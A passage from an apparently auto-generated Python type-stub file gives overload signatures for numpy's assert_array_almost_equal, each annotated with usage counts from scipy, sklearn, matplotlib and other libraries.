x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 12 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 15 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 16 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 17 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 32 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 64 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 128 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 256 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 512 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 1024 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[List[int], List[int]]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[int]]):
"""
usage.scipy: 298
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[List[int]]]):
"""
usage.scipy: 20
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["linear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["linear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["cubic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["cubic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["slinear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["slinear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["quadratic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["quadratic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["nearest"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["nearest"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["zero"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["zero"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["previous"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["previous"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["next"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["next"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: float):
"""
usage.scipy: 21
usage.sklearn: 15
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[float, complex]]):
"""
usage.scipy: 7
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.ndarray], y: List[List[Union[float, int]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.float64):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: int, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 8
usage.sklearn: 5
"""
...
@overload
def assert_array_almost_equal(
x: numpy.matrix, y: numpy.matrix, decimal: int, err_msg: str
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.matrix, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[float, int]]], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[int, float]]], y: numpy.ndarray):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[int, complex]]], y: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.matrix):
"""
usage.scipy: 93
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[float, int]]], y: numpy.matrix):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: List[List[Union[int, float, complex]]], y: numpy.matrix
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[int]], y: numpy.matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[int, complex]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[complex, int]]]):
"""
usage.scipy: 10
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[complex, int]]):
"""
usage.scipy: 12
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[float, int]]):
"""
usage.scipy: 1
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[float, int]]]):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[complex, int, float]]]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[int, complex]]]):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[complex]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[complex]]):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[numpy.float64, int]]):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[numpy.complex128, int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[float]], y: numpy.ndarray, decimal: int):
"""
usage.scipy: 10
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[float, int]]], decimal: int
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.ndarray):
"""
usage.scipy: 6
usage.sklearn: 5
"""
...
@overload
def assert_array_almost_equal(
x: List[Tuple[numpy.int64, numpy.int64]], y: List[Tuple[numpy.int64, numpy.int64]]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: Tuple[numpy.float64, numpy.float64], y: List[float]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: Tuple[numpy.float64, numpy.float64], y: List[int]):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: List[Tuple[numpy.float64, numpy.float64]], y: List[Tuple[float, float]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[int], y: numpy.ndarray):
"""
usage.scipy: 24
"""
...
@overload
def assert_array_almost_equal(x: list, y: numpy.ndarray):
"""
usage.scipy: 7
"""
...
@overload
def assert_array_almost_equal(x: List[list], y: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: List[List[int]], y: numpy.ndarray):
"""
usage.scipy: 173
"""
...
@overload
def assert_array_almost_equal(x: List[List[List[int]]], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[float], decimal: int):
"""
usage.matplotlib: 4
usage.scipy: 37
usage.sklearn: 61
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[int], decimal: int):
"""
usage.scipy: 35
usage.sklearn: 12
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: Tuple[float, int, float], decimal: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[float]], decimal: int):
"""
usage.scipy: 5
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.float64, decimal: int):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: float, y: int):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: int):
"""
usage.scipy: 12
usage.sklearn: 7
"""
...
@overload
def assert_array_almost_equal(x: bool, y: bool):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.bool_, y: bool):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: List[float], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 3
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: List[complex], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: float):
"""
usage.matplotlib: 4
usage.scipy: 8
usage.sklearn: 7
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[int, float]]], decimal: int
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 4
usage.sklearn: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[complex, int]], err_msg: str
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[complex, numpy.float64, int]], err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[numpy.float64, complex, int]], err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[float, int]], decimal: int
):
"""
usage.scipy: 10
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(
x: List[Union[int, float]], y: numpy.ndarray, decimal: int
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.ndarray, decimal: int):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: float, y: float):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[int, numpy.float64]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[int, float]], decimal: int
):
"""
usage.scipy: 1
usage.sklearn: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[numpy.float64]):
"""
usage.scipy: 7
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: int, decimal: int):
"""
usage.scipy: 4
usage.sklearn: 17
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex64, y: numpy.complex128, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: numpy.complex128, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex256, y: numpy.complex256, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.float64):
"""
usage.matplotlib: 1
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.matrix):
"""
usage.scipy: 12
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[int, float]]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint64, y: numpy.uint64):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.int64, y: numpy.int64):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: numpy.complex128):
"""
usage.scipy: 9
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: numpy.float64):
"""
usage.matplotlib: 3
usage.scipy: 9
usage.sklearn: 25
"""
...
@overload
def assert_array_almost_equal(x: numpy.ulonglong, y: numpy.uint64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.longlong, y: numpy.int64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex64, y: numpy.complex64):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.float32, y: numpy.float32):
"""
usage.scipy: 6
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex256, y: numpy.complex256):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.float128, y: numpy.float128):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint8, y: numpy.uint8):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.int8, y: numpy.int8):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint32, y: numpy.uint32):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.int32, y: numpy.int32):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ulonglong, y: numpy.ulonglong):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.longlong, y: numpy.longlong):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint16, y: numpy.uint16):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.int16, y: numpy.int16):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.bool_, y: numpy.bool_):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.matrix, decimal: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.matrix, decimal: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[float]]):
"""
usage.scipy: 2
usage.sklearn: 16
"""
...
@overload
def assert_array_almost_equal(x: Tuple[numpy.float64, numpy.float64], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: numpy.ndarray,
decimal: int,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: List[numpy.float64],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
decimal: int,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: numpy.float64, decimal: int):
"""
usage.scipy: 3
usage.sklearn: 13
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128],
y: Tuple[numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64],
y: Tuple[numpy.float64, numpy.float64, numpy.float64],
decimal: int,
):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: List[Union[float, numpy.float64]],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: float, decimal: int):
"""
usage.scipy: 2
usage.sklearn: 3
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray],
y: Tuple[numpy.ndarray, numpy.ndarray],
decimal: int,
):
"""
usage.scipy: 9
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: numpy.ndarray, decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: Tuple[numpy.ndarray, numpy.ndarray], decimal: int
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: numpy.float64):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[numpy.float64], decimal: int):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: List[numpy.float64],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: List[float]):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: List[Union[float, numpy.float64]],
decimal: int,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: List[Union[float, int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: List[numpy.float64]):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: Tuple[float, float, float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[float], y: numpy.ndarray, decimal: int):
"""
usage.matplotlib: 1
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.morestats.FlignerResult, y: Tuple[float, float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: Tuple[float, float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.ndarray], y: List[numpy.ndarray]):
"""
usage.scipy: 1
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(
x: List[numpy.float64], y: Tuple[numpy.float64, numpy.float64]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: numpy.ndarray, decimal: int):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats._stats_mstats_common.LinregressResult,
y: Tuple[float, float, float, float, float],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[numpy.float64, float]]]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.Ttest_1sampResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.FriedmanchisquareResult, y: Tuple[float, float]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.FriedmanchisquareResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: scipy.stats.stats.KstestResult, decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: Tuple[float, float]):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(
x: List[numpy.ndarray], y: Tuple[List[float], List[float]]
):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.Ttest_relResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: List[numpy.float64]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: List[numpy.ndarray]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.Ttest_indResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: Tuple[numpy.float64, numpy.float64]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: float, y: float, decimal: int):
"""
usage.scipy: 4
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: float, decimal: int):
"""
usage.scipy: 1
usage.sklearn: 25
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.NormaltestResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.SkewtestResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.KurtosistestResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.SkewtestResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.KurtosistestResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.NormaltestResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.MannwhitneyuResult, y: Tuple[float, float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float32, numpy.float32, numpy.float32, numpy.float32],
y: Tuple[float, float, float, float],
decimal: int,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
decimal: int,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: list):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: Tuple[int, int, int, int],
decimal: int,
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: List[int]):
"""
usage.matplotlib: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray
):
"""
usage.matplotlib: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: List[Union[int, float]]):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ma.core.MaskedArray):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: List[int]):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: numpy.ndarray):
"""
usage.matplotlib: 7
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: numpy.ma.core.MaskedArray):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: List[float]):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: List[float], decimal: int
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: List[List[float]], y: numpy.ndarray):
"""
usage.matplotlib: 5
usage.sklearn: 6
"""
...
@overload
def assert_array_almost_equal(x: dask.array.core.Array, y: numpy.ndarray):
"""
usage.dask: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["X != TP'"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["Y != UQ'"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["rotation on X failed"]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["rotation on Y failed"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[int], err_msg: str):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: List[Union[float, int]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.memmap, decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.int64], y: numpy.ndarray):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[float, int]], err_msg: str
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.float32, y: numpy.float64):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.float32, y: numpy.float64, decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[int]], decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.int64], y: List[numpy.int64]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["with solver = sag"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["with solver = saga"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["with solver = lbfgs"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: List[numpy.float64], y: List[numpy.float64], decimal: int
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray, decimal: bool):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[numpy.int64]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: Tuple[numpy.float64, numpy.float64], decimal: int
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: int, y: numpy.float64, decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: int, y: numpy.int64):
"""
usage.sklearn: 1
"""
...
def assert_array_almost_equal(
x: object, y: object, decimal: Union[bool, int] = ..., err_msg: str = ...
):
"""
usage.dask: 1
usage.matplotlib: 86
usage.scipy: 3904
usage.skimage: 69
usage.sklearn: 1569
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 11
usage.skimage: 1
"""
...
@overload
def assert_array_almost_equal_nulp(
x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray
):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.ma.core.MaskedArray, y: numpy.float64):
"""
usage.skimage: 2
"""
...
@overload
